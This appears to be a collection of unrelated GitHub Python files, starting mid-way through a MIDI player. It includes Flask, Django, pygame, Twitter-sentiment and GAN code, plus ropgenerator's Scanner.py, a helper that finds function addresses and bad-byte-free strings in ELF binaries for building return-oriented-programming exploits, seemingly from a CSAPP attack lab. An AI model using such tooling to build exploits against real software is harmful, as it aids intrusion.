4) | (channel & 15))) + \\\n\t\tarray.array(\"d\", amps).tobytes() + \\\n\t\tb\"\\xF1\" + \\\n\t\tstruct.pack(\"B\", channel & 15) + \\\n\t\tEnvelope.pack(4410, 44100, 0.3, 10000)\n\n\ndef playnote(note, amp):\n\tif amp != 0:\n\t\tsys.stdout.buffer.write(bytes([0, note, amp]))\n\telse:\n\t\tsys.stdout.buffer.write(bytes([1, note]))\n\tsys.stdout.buffer.flush()\n\nif sys.argv[1] == \"--loop\":\n\tloop = True\n\tfile = mido.MidiFile(sys.argv[2])\nelse:\n\tloop = False\n\tfile = mido.MidiFile(sys.argv[1])\nsys.stderr.write(\"%.2f seconds\\n\" % file.length)\nplay = file.play()\nwhile True:\n\ttry:\n\t\tfor msg in play if not loop else file.play():\n\t\t\t#sys.stderr.write(str(msg.bytes()))\n\t\t\tif msg.type in ('note_on', 'note_off', 'pitchwheel'):\n\t\t\t\tsys.stdout.buffer.write(bytes(msg.bytes()))\n\t\t\telif msg.type == 'program_change':\n\t\t\t\tsys.stdout.buffer.write(bytes(msg.bytes()))\n#\t\t\t\tif msg.program > 1:\n#\t\t\t\t\tsys.stdout.buffer.write(bytes(msg.bytes()))\n#\t\t\t\telse:\n#\t\t\t\t\tamps = [1.0, 0, 1/4, 0, 1/9, 0, 1/16, 0, 1/49]\n#\t\t\t\t\tsys.stdout.buffer.write(make_instrument(msg.channel, amps))\n\t\t\tsys.stdout.buffer.flush()\n\t\tbreak\n\texcept KeyboardInterrupt:\n\t\t#sys.stdout.close()\n\t\t#https://docs.python.org/3/faq/library.html#why-doesn-t-closing-sys-stdout-stdin-stderr-really-close-it\n\t\texit()\nexit()\n\"\"\"\nfor msg in mido.MidiFile(sys.argv[1]).play():\n\t#sys.stderr.write(str(msg.bytes()))\n\tif msg.type == 'note_on' and msg.velocity > 0:\n\t\tsys.stdout.buffer.write(bytes(msg.bytes()))\n\telif msg.type == 'note_off':\n\t\tsys.stdout.buffer.write(bytes(msg.bytes()))\n\telif msg.type == 'note_on' and msg.velocity == 0:\n\t\tsys.stdout.buffer.write(bytes([0x80+msg.channel, msg.note, 0]))\n\telif msg.type == 'program_change':\n\t\tsys.stdout.buffer.write(bytes(msg.bytes()))\n\tsys.stdout.buffer.flush()\n\"\"\"\n","repo_name":"zachs18/midi-player","sub_path":"midi.py","file_name":"midi.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2363354692","text":"size = int(input())\nfarm = []\ncolheita = 0\nfor _ in range(size):\n farm.append(list(map(int, input().split())))\n\noperations = int(input())\nfor _ in range(operations):\n primeira_linha, primeira_coluna, linha_final, coluna_final = map(int, input().split())\n for linha in range(primeira_linha-1, linha_final):\n for coluna in range(primeira_coluna-1, coluna_final):\n colheita += farm[linha][coluna]\n farm[linha][coluna] = 0\n\nprint(colheita)\n","repo_name":"DyogoBendo/exercicios-maratona-programacao","sub_path":"davi/Array, Matrizes e Funções/manolo_neps.py","file_name":"manolo_neps.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32459467430","text":"from src import pagedimensions as pd\nimport tinycss\nimport os\n\nclass Styler:\n def __init__(self):\n self.pageDim = {\n # Sizes ordered as WxH in cm\n 'a0': pd.PageDimensions(84.1, 118.9),\n 'a1': pd.PageDimensions(59.4, 84.1),\n 'a2': pd.PageDimensions(42.0, 59.4),\n 'a3': pd.PageDimensions(29.7, 42.0),\n 'a4': pd.PageDimensions(21.0, 29.7),\n 'a5': pd.PageDimensions(14.8, 21.0),\n 'a6': pd.PageDimensions(10.5, 14.8),\n 'b0': pd.PageDimensions(100.0, 141.4),\n 'b1': pd.PageDimensions(59.4, 84.1),\n 'b2': pd.PageDimensions(42.0, 59.4),\n 'b3': pd.PageDimensions(29.7, 42.0),\n 'b4': pd.PageDimensions(21.0, 29.7),\n 'b5': pd.PageDimensions(14.8, 21.0),\n 'b6': pd.PageDimensions(10.5, 14.8),\n 'elevenseventeen': pd.PageDimensions(27.94, 43.1),\n 'legal': pd.PageDimensions(21.59, 35.56),\n 'letter': pd.PageDimensions(21.59, 27.94)\n }\n self.theme = 'simple'\n self.margin = 'normal'\n self.top = 2.0\n self.left = 2.0\n self.pagesize = 'letter'\n self.orientation = 'portrait' # One of ['portrait', 'landscape']\n self.pgnum = False\n self.title = 'New Document'\n self.template = ''\n self.width\n self.height\n\n\n @property\n def theme(self):\n return self._theme\n \n @theme.setter\n def theme(self, theme_fn):\n \"\"\" Sets a new theme for the document \"\"\"\n # Check if the file passed in exists\n filename = \"themes/\" + theme_fn + '/' + theme_fn + \".css\"\n if (os.path.exists(filename) == False):\n print(\"[PARSER_ERR] Could not find theme file '{}'. Please make sure that the theme is in the theme/ folder. Falling back on default theme.\".format(filename))\n return\n\n # Open and read the new themesheet from the themes/ folder\n f = open(filename, \"r\")\n new_theme = f.read()\n f.close()\n\n # Validate the CSS for the document and set the CSS if it is valid\n verifier = tinycss.make_parser('page3')\n parsed_contents = verifier.parse_stylesheet(new_theme)\n self._theme = new_theme \n\n @property\n def margin(self):\n return self._margin\n\n @margin.setter\n def margin(self, new_margin):\n \"\"\" Sets a new margin \"\"\"\n self._margin = new_margin\n\n @property\n def top(self):\n return self._top\n\n @top.setter\n def top(self, new_TB):\n \"\"\" Sets new top value \"\"\"\n self._top = new_TB\n\n @property\n def left(self):\n return self._left\n\n @left.setter\n def left(self, new_LR):\n \"\"\" Sets new left value \"\"\"\n self._left = new_LR\n\n @property\n def pagesize(self):\n return self._pagesize\n\n @pagesize.setter\n def pagesize(self, new_pagesize):\n \"\"\" Sets a new pagesize \"\"\"\n self._pagesize = new_pagesize\n self._height = 1\n self._width = 1\n\n @property\n def orientation(self):\n return self._orientation\n\n @orientation.setter\n def orientation(self, new_orientation):\n \"\"\" Sets a new orientation for the document \"\"\"\n self._orientation = new_orientation\n\n @property\n def pgnum(self):\n return self._pgnum\n \n @pgnum.setter\n def pgnum(self, onOrOff: bool):\n \"\"\" Turns the page numbers on or off \"\"\"\n self._pgnum = onOrOff\n\n @property\n def title(self):\n return self._title\n\n @title.setter\n def title(self, new_title):\n \"\"\" Sets the title of the document \"\"\"\n self._title = new_title\n\n @property\n def template(self):\n return self._template\n\n @template.setter\n def template(self, new_template):\n \"\"\" Sets the preprocessor command template of the document \"\"\"\n self._template = new_template\n\n @property\n def width(self):\n return self._width\n\n @width.setter\n def width(self, a):\n \"\"\" Sets the width of the document based on orientation \"\"\"\n if self._orientation == 'portrait':\n page_width = (self.pageDim[self._pagesize]).width\n self._width = page_width - (2 * self._left)\n if self._orientation == 'landscape':\n page_height = (self.pageDim[self._pagesize]).height\n self._width = page_height - (2 * self._top)\n\n \n @property\n def height(self):\n return self._height\n \n @height.setter\n def height(self, a):\n \"\"\" Sets the height of the document based on orientation \"\"\"\n if self._orientation == 'portrait':\n page_height = (self.pageDim[self._pagesize]).height\n self._height = page_height - (2 * self._top)\n if self._orientation == 'landscape':\n page_width = (self.pageDim[self._pagesize]).width\n self._height = page_width - (2 * self._left)\n\n \n\n","repo_name":"rafaelwi/rnote","sub_path":"src/styling.py","file_name":"styling.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30077924358","text":"\"\"\"\nThis module implements response for department requests\n\"\"\"\nfrom flask import request\nfrom marshmallow import ValidationError\nimport src.service.database_queries as service\nfrom flask_restful import Resource\nfrom src import db\nfrom src.rest.resources.wrappers import check_authorisation\nfrom src.schemas.department import DepartmentSchema\n\n\nclass DepartmentApi(Resource):\n \"\"\"\n Class for department restfull resource\n \"\"\"\n department_schema = DepartmentSchema()\n\n @check_authorisation\n def get(self, uuid=None):\n \"\"\"\n get method for department request\n :param uuid: optional parameter uses for getting department by uuid\n :return: departments data in json\n \"\"\"\n if uuid is None:\n departments = service.get_all_departments()\n return self.department_schema.dump(departments, many=True), 200\n department = service.get_department_by_uuid(uuid)\n if not department:\n return \"\", 404\n return self.department_schema.dump(department), 200\n\n @check_authorisation\n def post(self):\n \"\"\"\n post method for department request\n :return: created department data in json\n \"\"\"\n try:\n department = self.department_schema.load(request.json, session=db.session)\n except ValidationError as err:\n return {\"message\": str(err)}, 400\n service.add_department(department)\n return self.department_schema.dump(department), 201\n\n @check_authorisation\n def put(self, uuid):\n \"\"\"\n put method for department request\n :param uuid: uuid of department you want to change\n :return: changed department data in json\n \"\"\"\n department = service.get_department_by_uuid(uuid)\n if not department:\n return \"\", 404\n try:\n department = self.department_schema.load(request.json, session=db.session)\n except ValidationError as err:\n return {\"message\": str(err)}, 400\n service.update_department(department, uuid)\n return self.department_schema.dump(department), 200\n\n @check_authorisation\n def patch(self, uuid):\n \"\"\"\n put method for department request\n :param uuid: uuid of department you want to change\n :return: changed department data in json\n \"\"\"\n department = service.get_department_by_uuid(uuid)\n if not department:\n return \"\", 404\n update_json = request.json\n if not update_json:\n return {\"message\": \"nothing to update\"}, 400\n service.alter_department(department, update_json)\n return self.department_schema.dump(department), 200\n\n @check_authorisation\n def delete(self, uuid):\n \"\"\"\n delete method for department request\n :param uuid: uuid of department you want to delete\n :return: request response\n \"\"\"\n department = service.get_department_by_uuid(uuid)\n if not department:\n return \"\", 404\n service.delete_department(department)\n return {\"message\": \"deleted successfully\"}, 204\n","repo_name":"akopika/epam_project","sub_path":"src/rest/resources/department.py","file_name":"department.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73638629283","text":"def dropStones(grid):\n rowLen = len(grid) - 1\n colLen = len(grid[0])\n for col in range(colLen):\n down = rowLen\n for top in range(rowLen, -1, -1):\n print(grid[top][col], end=\"\")\n if grid[top][col] == \"o\":\n down = top - 1\n elif grid[top][col] == \"*\":\n grid[down][col], grid[top][col] = grid[top][col], grid[down][col]\n down -= 1\n print()\n\n for i in range(rowLen + 1):\n print(\"\".join(grid[i]))\n\n\ntestcases = int(input())\ngrids = [[] for i in range(testcases)]\nfor i in range(testcases):\n dimesion = list(map(int, input().split()))\n for _ in range(dimesion[0]):\n grids[i].append(list(input()))\nfor grid in grids:\n dropStones(grid)\n","repo_name":"Haymanot-Demis/A2SV-Problems","sub_path":"Codeforces/E.Drop the Stones.py","file_name":"E.Drop the Stones.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73863946402","text":"# -*- coding:utf-8 -*- \n# Scanner module: Scan binaries to get useful infos for exploits \n\nimport subprocess\nimport mmap\nimport re\nfrom ropgenerator.Gadget import Gadget\nimport ropgenerator.Architecture as Arch\n\n# Test elftools \nfrom elftools.elf.elffile import ELFFile\nfrom elftools.elf.relocation import RelocationSection\nfrom elftools.elf.sections import SymbolTableSection, NullSection\n\nbinary_name = None\nbinary_ELF = None\n\ndef initScanner(filename):\n global binary_name\n global binary_ELF\n \n binary_name = filename\n f = open(binary_name, 'rb')\n \n if( Arch.currentIsELF()):\n binary_ELF = ELFFile(f)\n else:\n binary_ELF = None\n\n##################\n# Manage offsets #\n##################\n_offset = 0\ndef set_offset(offset):\n global _offset\n _offset = offset\n return True\n \ndef reset_offset():\n global _offset\n _offset=0\n \n\ndef getAllFunctions():\n \"\"\"\n Return a list of all functions for relocation entries\n \"\"\"\n global _offset \n # Get functions from relocations \n relasec_name = '.rela.plt'\n relasec = binary_ELF.get_section_by_name(relasec_name)\n if not isinstance(relasec, RelocationSection):\n return []\n else:\n relasec_addr = relasec.header['sh_addr']\n symbols = binary_ELF.get_section(relasec.header['sh_link'])\n if( not isinstance(symbols, NullSection)): \n return [(symbols.get_symbol(reloc['r_info_sym']).name, reloc['r_offset']+relasec_addr + _offset) for reloc in relasec.iter_relocations() if reloc.is_RELA()]\n return []\n\ndef getSectionAddress(name):\n \"\"\"\n Returns the address of a segment in the loaded binary \n \"\"\" \n global binary_ELF, _offset\n section = binary_ELF.get_section_by_name(name)\n if( not section ):\n return None\n return section.header[\"sh_addr\"] + _offset\n \ndef getSymbolSections():\n global binary_ELF\n\n if( not Arch.currentIsELF ):\n return []\n return [section for section in binary_ELF.iter_sections() if( isinstance(section, SymbolTableSection))]\n \ndef getFunctionAddress(name):\n \"\"\"\n Looks for the function 'name' in the PLT of a binary \n Returns a pair (name, address) as (str, int)\n \"\"\"\n global binary_name\n global binary_ELF, _offset\n \n if( not Arch.currentIsELF()):\n return (None, None)\n \n # Get function in relocatins\n relasec_name = '.rela.plt'\n relasec = binary_ELF.get_section_by_name(relasec_name)\n if not isinstance(relasec, RelocationSection):\n return (None,None)\n relasec_addr = relasec.header['sh_addr']\n symbols = binary_ELF.get_section(relasec.header['sh_link'])\n if( not isinstance(symbols, NullSection)): \n for reloc in relasec.iter_relocations():\n if (symbols.get_symbol(reloc['r_info_sym']).name == name ):\n return (name, reloc['r_offset']+relasec_addr + _offset)\n \n # Get function from symbol table sections \n for symsec in getSymbolSections():\n function = symsec.get_symbol_by_name(name)\n if( function ):\n return (name, function[0]['st_value'] + _offset) \n return (None, None)\n\ndef findBytes(byte_string, badBytes = [], add_null=False ):\n \"\"\"\n Parameters\n ----------\n badbytes : bad bytes for substrings addresses\n add_null : if True then add terminaison null bytes in the end of the substrings \n \n Example: \n byte_string = 'abc' then result is the address of a string 'abc\\x00'\n or a list of addresses s.t elements form 'abc' like 'ab\\x00' 'c\\x00' \n \"\"\"\n \n def _find_substr(m,string):\n if( not string ):\n return [-1,0]\n # Initialize\n offset = -1\n index = len(string)\n substring = string\n # Search biggest substring \n while( offset == -1 ):\n if( len(substring) <= 0 ):\n return [-1,0]\n offset = m.find(substring)\n if( offset != -1 ):\n return [offset, index]\n else:\n substring = substring[:-1]\n index = index -1\n \n def _find_substr_add_null(m, string):\n if( not string ):\n return [-1,0]\n # Initialize\n offset = -1\n index = len(string)\n last_is_null = (string[-1] == '\\x00')\n if( not last_is_null ):\n substring = string + '\\x00'\n else:\n substring = string\n # Search biggest substring \n while( offset == -1 ):\n if( len(substring) <= 0 ):\n return [-1,0]\n offset = m.find(substring)\n if( offset != -1 ):\n return [offset, index]\n else:\n substring = substring[:-2]\n if( not substring ):\n return [-1,0]\n last_is_null = (substring[-1] == '\\x00') \n if( not last_is_null ):\n substring = substring + '\\x00'\n index = index -1\n \n def _verify_bad_bytes(addr, badBytes):\n addrBytes = re.findall('..',('{:'+'{:02d}'\\\n .format(Arch.currentArch.octets)+'x}').format(addr))\n for byte in badBytes:\n if( byte in addrBytes):\n return False\n return True\n \n # Function body \n global binary_name\n global binary_ELF, _offset\n \n section_names = [\".text\", '.data']\n # Getting data from all sections\n sections = []\n for section_name in section_names:\n section = binary_ELF.get_section_by_name(section_name)\n if( section.is_null() ):\n continue\n m = section.data()\n addr = section.header['sh_addr']\n sections.append((m, addr))\n if( not sections ):\n return []\n \n # Getting bytes as substrings \n res = []\n substring = str(byte_string)\n while( substring ):\n found = False\n section_num = 0\n (m, section_addr) = sections[section_num]\n start = 0\n end = len(m)-1\n ## \n m_tmp = str(m)\n section_changed = False\n while( not found ):\n if( not m_tmp ):\n section_changed = True\n section_num += 1\n \n if( section_num >= len(sections)):\n # Coudln't find substring in any sections \n return []\n \n if( section_changed ):\n (m, section_addr) = sections[section_num]\n start = 0\n end = len(m)-1\n m_tmp = str(m)\n \n # Get substring address \n if( add_null ):\n (offset, index ) = _find_substr_add_null(m_tmp, substring)\n else:\n (offset, index ) = _find_substr(m_tmp, substring)\n # We didn't find any match, try next section \n if( index == 0 ):\n section_num += 1\n section_changed = True\n else:\n section_changed = False\n # Check for bad bytes in the address \n if( not section_changed ):\n if( _verify_bad_bytes(start+offset, badBytes)):\n found = True\n else:\n m_tmp = m_tmp[offset:]\n \n # We add the best substring we found\n if( add_null and substring[:index] != '\\x00'):\n res.append([offset+section_addr+_offset,substring[:index]+\"\\x00\"])\n else:\n res.append([offset+section_addr+_offset,substring[:index]])\n substring = substring[index:]\n section_num = 0\n \n return res\n","repo_name":"xubenji/csapp","sub_path":"attacklab03/target1/venv/lib/python2.7/site-packages/ropgenerator-1.2-py2.7.egg/ropgenerator/exploit/Scanner.py","file_name":"Scanner.py","file_ext":"py","file_size_in_byte":7617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28901420638","text":"from django.shortcuts import render\nfrom django.http.response import HttpResponseRedirect\n\n# Create your views here.\ndef main(request):\n return render(request, 'main.html')\n\ndef setos(request):\n if \"favorite_os\" in request.GET:\n print(request.GET[\"favorite_os\"])\n request.session['f_os'] = request.GET[\"favorite_os\"] # session 생성함\n \n return HttpResponseRedirect('/showos') # showos 요청이 발생\n else:\n return render(request, 'setos.html')\n \n # Render는 forwarding\n # HttpResponseRedirect는 redirect\n \ndef showos(request):\n context ={} #dict\n \n if 'f_os' in request.session: # 세션 키 중에서 'f_os'가 있다면\n context['f_os'] = request.session['f_os'] # request.session.get('f_os')\n context['message'] = \"그대가 선택한 운영체제는 %s\" % request.session['f_os']\n \n else:\n context['f_os'] = None\n context['message'] = \"ㅠㅠ 운영체제를 선택하지 못했네요\"\n \n request.session.set_expiry(5) # 5초간 유효\n return render(request, 'show.html', context)\n ","repo_name":"bnb1212/Portfolio","sub_path":"PythonProject/django_test3/sessionapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22680731013","text":"\"\"\"\nAlexNet Architecture\n\nInput Width, Height, channel = 227 x 227 x3\n Conv1:\n Filter = 11x11 \n Stride = 4\n Activate = ReLU\n MaxPooling => Filter = 3x3, Stride = 2\n \n Conv2:\n Filter = 5x5\n Stride = 1\n Padding = 2\n Activate = ReLU\n MaxPooling => Filter = 3x3, Stride = 2\n \n Conv3:\n Filter = 3x3\n Strider = 1\n Padding = 1\n Activate ReLU\n \n Conv4:\n Filter = 3x3\n Strider = 1\n Padding = 1\n Activate ReLU\n \n Conv5:\n Filter = 3x3\n Strider = 1\n Padding = 1\n Activate ReLU\n MaxPooling => Filter 3x3, Stride = 2\n \n Dropout:\n rate = 0.5\n\n\"\"\"\n\nimport torch\nimport torch.nn as nn\n\nclass AlexNet(nn.Module):\n def __init__(self, num_classes=1000):\n super(AlexNet, self).__init__()\n \n self.layers = nn.Sequential(\n \n nn.Conv2d(in_channels=3, out_channels=96, kernel_size=11, stride=4, padding=0),\n #Calcultation Layer => (3, 227, 227) -> (??, (227 + 0 - 11) / 4 + 1, (227 + 0 - 11) / 4 + 1)\n #Calcultation Layer => (3, 227, 227) -> (??, (216) / 4 + 1, (216) / 4 + 1)\n #Calcultation Layer => (3, 227, 227) -> (96, 54 + 1, 54 + 1)\n #Output_size = (96, 55, 55)\n nn.ReLU(),\n #Output_size = (96, 55, 55)\n nn.MaxPool2d(kernel_size=3, stride=2),\n #Calculation Layer => (96, 55, 55) -> (96, 27, 27)\n #Output_size = (96, 27, 27)\n nn.Conv2d(in_channels=96,out_channels=256,kernel_size=5, stride=1, padding=2),\n #Calculation Layer => (96, 27, 27) -> (256, (27 + 2 * 2 - 5) / 1 + 1, (27 + 2 * 2 - 5) / 1 + 1)\n #Calculation Layer => (96, 27, 27) -> (256, (26) / 1 + 1, (26) / 1 + 1)\n #Calculation Layer => (96, 27, 27) -> (256, 27, 27)\n #Output_size = (256, 27, 27)\n nn.ReLU(),\n #Output_size = (256, 27, 27)\n nn.MaxPool2d(kernel_size=3, stride=2),\n #Calculation Layer => (256, 27, 27) -> (256, 27 / 2, 27 / 2)\n #Calculation Layer => (256, 27, 27) -> (256, 13.xx, 13.xx)\n #Output_size = (256, 13, 13)\n nn.Conv2d(in_channels=256, out_channels=384, kernel_size=3, stride=1, padding=1),\n #Calculation Layer => (256, 13, 13) -> (384, (13 + 2 * 1 - 3) / 1 + 1, (13 + 2 * 1 - 3) / 1 + 1)\n #Calculation Layer => (256, 13, 13) -> (384, (12) / 1 + 1, (12) / 1 + 1)\n #Calculation Layer => (256, 13, 13) -> (384, 13, 13)\n #Output_size = (384, 13, 13)\n nn.ReLU(),\n #Output_size = (384, 13, 13)\n nn.Conv2d(in_channels=384, out_channels=384, kernel_size=3, stride=1, padding=1),\n #Calculation Layer => (384, 13, 13) -> (384, (13 + 2 * 1 - 3) / 1 + 1, (13 + 2 * 1 - 3) / 1 + 1)\n #Calculation Layer => (384, 13, 13) -> (384, (12) / 1 + 1, (12) / 1 + 1)\n #Calculation Layer => (384, 13, 13) -> (384, 13, 13)\n #Output_size = (384, 13, 13)\n nn.ReLU(),\n #Output_size = (384, 13, 13)\n nn.Conv2d(in_channels=384, out_channels=256, kernel_size=3, stride=1, padding=1),\n #Calculation Layer => (384, 13, 13) -> (256, (13 + 2 * 1 - 3) / 1 + 1, (13 + 2 * 1 - 3) / 1 + 1)\n #Calculation Layer => (384, 13, 13) -> (256, (12) / 1 + 1, (12) / 1 + 1)\n #Calculation Layer => (384, 13, 13) -> (256, 13, 13)\n nn.ReLU(),\n #Output_size = (256, 13, 13)\n nn.MaxPool2d(kernel_size=3, stride=2),\n #Output_size = (256, 6, 6)\n \n )\n \n self.classifier = nn.Sequential(\n nn.Dropout(p=0.5),#생략 가능\n #Input_size = (256, 6, 6)\n nn.Linear(in_features=256*6*6,out_features=4096),\n nn.ReLU(inplace=True),\n nn.Linear(in_features=4096,out_features=4096),\n nn.ReLU(),\n nn.Linear(in_features=4096,out_features=num_classes) \n )\n\n def init_bias_weights(self):\n for layer in self.layers:\n if isinstance(layer, nn.Conv2d):\n nn.init.normal_(layer.weight, mean=0, std=0.01)\n nn.init.constant_(layer.bias, 0)\n nn.init.constant_(self.net[4].bias, 1)\n nn.init.constant_(self.net[10].bias, 1)\n nn.init.constant_(self.net[12].bias, 1)\n \n def forward(self, x):\n x = self.layers(x)\n x = x.view(-1, 256 * 6 * 6)\n x = self.classifier(x)\n return x \n","repo_name":"hsysfan/Pytorch-implementation","sub_path":"models/AlexNet.py","file_name":"AlexNet.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32488384867","text":"import tweepy\nimport json\nimport logging\nimport sys\nimport os\nimport re\nfrom nlp import getSenimentScoreForTopic\nfrom storageUtils import Storage\n\nfrom dotenv import load_dotenv\nload_dotenv()\n\n_LOGGER = logging.getLogger(__name__)\n_LOGGER.setLevel(logging.DEBUG)\n\nconsoleHandler = logging.StreamHandler(sys.stdout)\nconsoleHandler.setLevel(logging.INFO)\n\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\nconsoleHandler.setFormatter(formatter)\n\n_LOGGER.addHandler(consoleHandler)\n\nCONSUMER_KEY = os.getenv(\"CONSUMER_KEY\")\nCONSUMER_SECRET = os.getenv(\"CONSUMER_SECRET\")\nACCESS_TOKEN = os.getenv(\"ACCESS_TOKEN\")\nACCESS_TOKEN_SECRET = os.getenv(\"ACCESS_TOKEN_SECRET\")\n\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\n\n\n# _LOGGER.info('fdksjfksdlfj')\n\n\napi = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\n\nwith open('data/stateAbbrev.json', \"r\") as states:\n stateID = json.load(states)\n\n# index = 0\n# for state in stateID:\n# if index > 45:\n# geostates = api.geo_search(query=state, granularity=\"city\")\n# for geostate in geostates:\n# if geostate.name == stateID[state]:\n# print(geostate.name, geostate.id)\n# index += 1\n\nwith open('data/stateID.json', \"r\") as states:\n stateCodes = json.load(states)\n\ntopicsMap = json.load(open('data/topics.json', 'r'))\n\n\nemoticons_happy = set([\n ':-)', ':)', ';)', ':o)', ':]', ':3', ':c)', ':>', '=]', '8)', '=)', ':}',\n ':^)', ':-D', ':D', '8-D', '8D', 'x-D', 'xD', 'X-D', 'XD', '=-D', '=D',\n '=-3', '=3', ':-))', \":'-)\", \":')\", ':*', ':^*', '>:P', ':-P', ':P', 'X-P',\n 'x-p', 'xp', 'XP', ':-p', ':p', '=p', ':-b', ':b', '>:)', '>;)', '>:-)',\n '<3'\n ])\n\nemoticons_sad = set([\n ':L', ':-/', '>:/', ':S', '>:[', ':@', ':-(', ':[', ':-||', '=L', ':<',\n ':-[', ':-<', '=\\\\', '=/', '>:(', ':(', '>.<', \":'-(\", \":'(\", ':\\\\', ':-c',\n ':c', ':{', '>:\\\\', ';('\n ])\n\n\ndef preprocess(tweet):\n # remove urls and mentions\n return ' '.join(re.sub(\"(@[A-Za-z0-9]+)|(\\w+:\\/\\/\\S+)\", \" \", tweet).split())\n\n\n\nemotics = emoticons_happy.union(emoticons_sad)\n\n\ndef getTweetsForTopic(topic):\n \n tweetsByState = {}\n for state in stateCodes:\n tweetsByState[state] = []\n\n max_queries = 6\n for state in stateCodes:\n \n stateCode = stateCodes[state]\n tweets = tweet_batch = api.search(q=\"place:{} {} lang:en \".format(stateCode,\n topicsMap[topic]), result_type=\"mixed\", count=100)\n count = 1\n\n #strange twitter search behaviour\n #even though search doesn't exceed count there are more results on subsequent search\n while count < max_queries:\n tweet_batch = api.search(q=\"place:{} {} lang:en \".format(stateCode, topicsMap[topic]),\n result_type=\"mixed\",\n count=100,\n max_id=tweet_batch.max_id)\n tweets.extend(tweet_batch)\n count += 1\n \n for tweet in tweets:\n if len(tweet.text) > 10:\n tweetsByState[state].append(\n {\n 'text': preprocess(tweet.text),\n 'retweet_count': tweet.retweet_count,\n 'favourite_count': tweet.favorite_count\n })\n _LOGGER.info('state {} has loaded {} for topic: {}'.format(state, len(tweets), topicsMap[topic]))\n \n fileName = 'data/twitterData/tweetState_{}.txt'.format(topic)\n try: \n Storage.upload(json.dumps(tweetsByState, ensure_ascii=False, indent=4), fileName)\n _LOGGER.info('tweets for {} have been successfully loaded.'.format(topicsMap[topic]))\n except IOError:\n _LOGGER.error('unable to successfuly load files')\n\n return tweetsByState\n\n\ndef loadAllTweetsandGetScores():\n #loadAll Tweets\n\n topicvals = topicsMap.keys()\n\n if topicvals:\n for topic in topicvals:\n getTweetsForTopic(topic)\n getSenimentScoreForTopic(topic)\n else:\n raise ImportError\n\n \n\n","repo_name":"btree1970/CountrySentiment","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35256335753","text":"import pygame\nfrom settings import Settings\nfrom ship import Ship\nimport game_functions as gf\nfrom pygame.sprite import Group\nfrom game_stats import GameStats\nfrom button import Button\nfrom scoreboard import ScoreBoard\n\n\ndef run_game():\n '''Initialize game and create a screen object '''\n\n pygame.init()\n ai_setting = Settings()\n screen = pygame.display.set_mode((ai_setting.screen_width,ai_setting.screen_height))\n # screen object is called surface\n # surface is a part of screen where game element is displayed\n pygame.display.set_caption(\"Alien Invasion\")\n\n # Make Ship\n ship = Ship(screen, ai_setting)\n\n # make group to store bullet in\n bullets = Group()\n\n # Make a single alien\n # aliens = Alien(ai_setting, screen)\n \n # Group of alien \n aliens = Group()\n # create a fleet of an alien\n gf.create_fleet(ai_setting, screen, aliens, ship)\n\n # creating an instance to store game statistics and scoreboard\n stats = GameStats(ai_setting)\n sb = ScoreBoard(ai_setting, screen, stats)\n\n # Make play button\n play_button = Button(ai_setting, screen, \"Play\")\n # start the main loop for the game\n while True:\n # Watch for the keyboard or mouse events\n gf.check_events(ai_setting, screen, aliens, ship, bullets, stats, sb, play_button)\n\n # check for game active\n if stats.game_active:\n # Changing ship position \n ship.update()\n\n # fire bullets\n gf.update_bullets(ai_setting, screen, ship, aliens, bullets, stats, sb)\n\n # move alien \n gf.update_aliens(ai_setting, stats, sb, screen, ship, aliens, bullets)\n \n # Update scren element - bg color, ship position, flip screen\n gf.update_screen(ai_setting, screen, ship, bullets, aliens, stats, sb, play_button)\n\n\nrun_game()","repo_name":"pratikv06/Python-Crash-Course","sub_path":"pygame/alien_invasion_run.py","file_name":"alien_invasion_run.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29078546375","text":"import torch\nimport torchvision\nfrom utils import *\nfrom config import get_parameters\nfrom PIL import Image\nfrom torchvision.utils import save_image\nfrom cal_FID import main as FID_cal\nimport os\nfrom Dataset import GAN_data\nimport random\n\nfrom SAGAN import Generator_SAGAN\n\nload_path = './checkpoints/hw2_face/SAGAN_model_G.pth'\nnum_output = 1000\n\ntorch.manual_seed(7414)\ntorch.cuda.manual_seed_all(7414)\nnp.random.seed(7414)\nrandom.seed(7414)\ntorch.backends.cudnn.deterministic = True\nos.makedirs('./generate_images/SAGAN', exist_ok=True)\nsave_path = './generate_images/SAGAN'\n\ngrid_image = torch.zeros((32, 3, 64, 64))\nargs = get_parameters()\n# Create the generator network.\nnetG = Generator_SAGAN(args.imsize, args.z_dim, args.g_conv_dim).cuda()\n# Load the trained generator weights.\nnetG.load_state_dict(torch.load(load_path))\nnetG.eval()\n\nnoise = torch.randn(num_output, args.z_dim).cuda()\n\n# Turn off gradient calculation to speed up the process.\nfor idx, latent_vector in enumerate(noise):\n\twith torch.no_grad():\n\t\tgenerated_img,_,_ = netG(latent_vector.unsqueeze(0))\n\t\tgenerated_img = denorm(generated_img.data)\n\t\tif idx <32:\n\t\t\tgrid_image[idx] 